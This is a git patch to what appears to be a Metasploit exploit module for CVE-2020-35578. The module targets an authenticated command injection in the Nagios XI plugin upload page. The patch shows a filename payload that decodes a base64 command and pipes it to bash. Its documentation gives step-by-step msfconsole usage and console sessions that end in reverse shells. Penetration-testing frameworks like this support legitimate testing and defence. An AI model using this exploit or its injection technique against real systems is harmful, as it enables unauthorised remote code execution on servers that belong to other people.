From 154e237eddfcc90aae9e003b4ef64da95202e951 Mon Sep 17 00:00:00 2001 From: Grant Willcox Date: Wed, 14 Apr 2021 15:33:42 -0500 Subject: [PATCH] Add in fixes to documentation and module that were covered in the review process --- ...s_xi_plugins_filename_authenticated_rce.md | 54 ++++++++++--------- ...s_xi_plugins_filename_authenticated_rce.rb | 24 +++++---- 2 files changed, 44 insertions(+), 34 deletions(-) diff --git a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md index b998b3c4b5..41abe0254f 100644 --- a/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md +++ b/documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md @@ -1,22 +1,26 @@ ## Vulnerable Application -This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php` -that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin. +This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php` +page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated +admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin. The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and -obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable. +obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable. -Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`. -This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name. -Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns. +Next, the module sends a HTTP POST request to `/admin/monitoringplugins.php` containing a file whose filename is set such that it +will escape the existing command that `/admin/monitoringplugins.php` uses on its backend and will instead cause the server to start +executing the attacker's own commands as the `apache` user. + +Once the upload is complete, a new plugin entry will be created along with a corresponding file in `/usr/local/nagios/libexec/` +with the full payload as the file name. Deleting the malicious plugin/file via the web interface was not possible during testing, +so it is automatically deleted when a session spawns. The module may fail during the first run. If that happens, try running it again with the same settings. -The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1). +The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1) +and has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7. +Valid credentials for a Nagios XI admin user are required for exploitation. -Valid credentials for a Nagios XI admin user are required. -This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7. - -Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php). +Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php). Detailed installation instructions are available [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf) and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I). @@ -25,8 +29,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch 1. Start msfconsole 2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce` 3. Do: `set RHOSTS [IP]` -4. Do: `set USERNAME [username for the Nagios XI account]` -5. Do: `set PASSWORD [password for the Nagios XI account]` +4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]` +5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]` 6. Do: `set target [target]` 7. Do: `set payload [payload]` 8. Do: `set LHOST [IP]` @@ -47,14 +51,14 @@ The username for the Nagios XI account to authenticate with. The default value i ``` Id Name -- ---- -0 Linux +0 Linux (x86/x64) 1 CMD ``` ## Scenarios ### Nagios XI 5.3.0 running on CentOS 7 - Linux target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16 rhosts => 192.168.1.16 @@ -62,7 +66,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos lhost => 192.168.1.12 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi password => nagiosxi -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): @@ -99,12 +103,12 @@ Exploit target: Id Name -- ---- - 0 Linux + 0 Linux (x86/x64) msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [+] Successfully authenticated to Nagios XI @@ -125,7 +129,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4 ``` ### Nagios XI 5.7.5 running on CentOS 7 - CMD target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1 target => 1 @@ -135,7 +139,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos lhost => 192.168.1.12 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin password => nagiosadmin -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): @@ -177,7 +181,7 @@ Exploit target: msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [+] Successfully authenticated to Nagios XI @@ -192,7 +196,7 @@ uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) contex ``` ### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target ``` -msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce +msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce [*] Using configured payload linux/x86/meterpreter/reverse_tcp msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14 rhosts => 192.168.1.14 @@ -202,7 +206,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set pass password => nagiosadmin msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true finish_install => true -msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options +msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce): @@ -239,12 +243,12 @@ Exploit target: Id Name -- ---- - 0 Linux + 0 Linux (x86/x64) msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run -[*] Started reverse TCP handler on 192.168.1.12:4444 +[*] Started reverse TCP handler on 192.168.1.12:4444 [*] Executing automatic check (disable AutoCheck to override) [*] Attempting to authenticate to Nagios XI... [!] The target seems to be a Nagios XI application that has not been fully installed yet. diff --git a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb index 4cb440ea45..b97727eba6 100644 --- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb @@ -16,11 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Nagios XI 5.3.0-5.7.9 - Plugins Filename Authenticated Remote Code Exection', + 'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection', 'Description' => %q{ - This module exploits a vulnerability in `/admin/monitoringplugins.php` that - enables an authenticated admin user to achieve remote code execution as the - `apache` user by uploading a malicious plugin. + This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php` + page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows + an authenticated admin user to achieve remote code execution as the `apache` user by uploading + a malicious plugin. Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both @@ -42,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Targets' => [ [ - 'Linux', { + 'Linux (x86/x64)', { 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'linux', # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation @@ -63,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'Notes' => { - 'Stability' => [ CRASH_SAFE, ], + 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time } @@ -140,8 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Target is Nagios XI with version #{nagios_version}") # check if the target is actually vulnerable - version = Rex::Version.new(nagios_version) - if version < Rex::Version.new('5.8.0') + @version = Rex::Version.new(nagios_version) + if @version < Rex::Version.new('5.8.0') return CheckCode::Appears end @@ -149,7 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, _opts = {}) - # encode the payload, which is necessary for the exploit to work + # Convert the payload to hex ASCII and then Base64 encode the payload. + # This is necessary for the exploit to work. payload_ascii = Rex::Text.to_hex_ascii(cmd) payload_base64 = Rex::Text.encode_base64(payload_ascii) payload = ";echo #{payload_base64} | base64 -d | bash;#" @@ -174,6 +176,10 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + if @version < Rex::Version.new('5.3.0') + fail_with(Failure::NoTarget, "Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!") + end + # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload res = send_request_cgi({ 'method' => 'GET',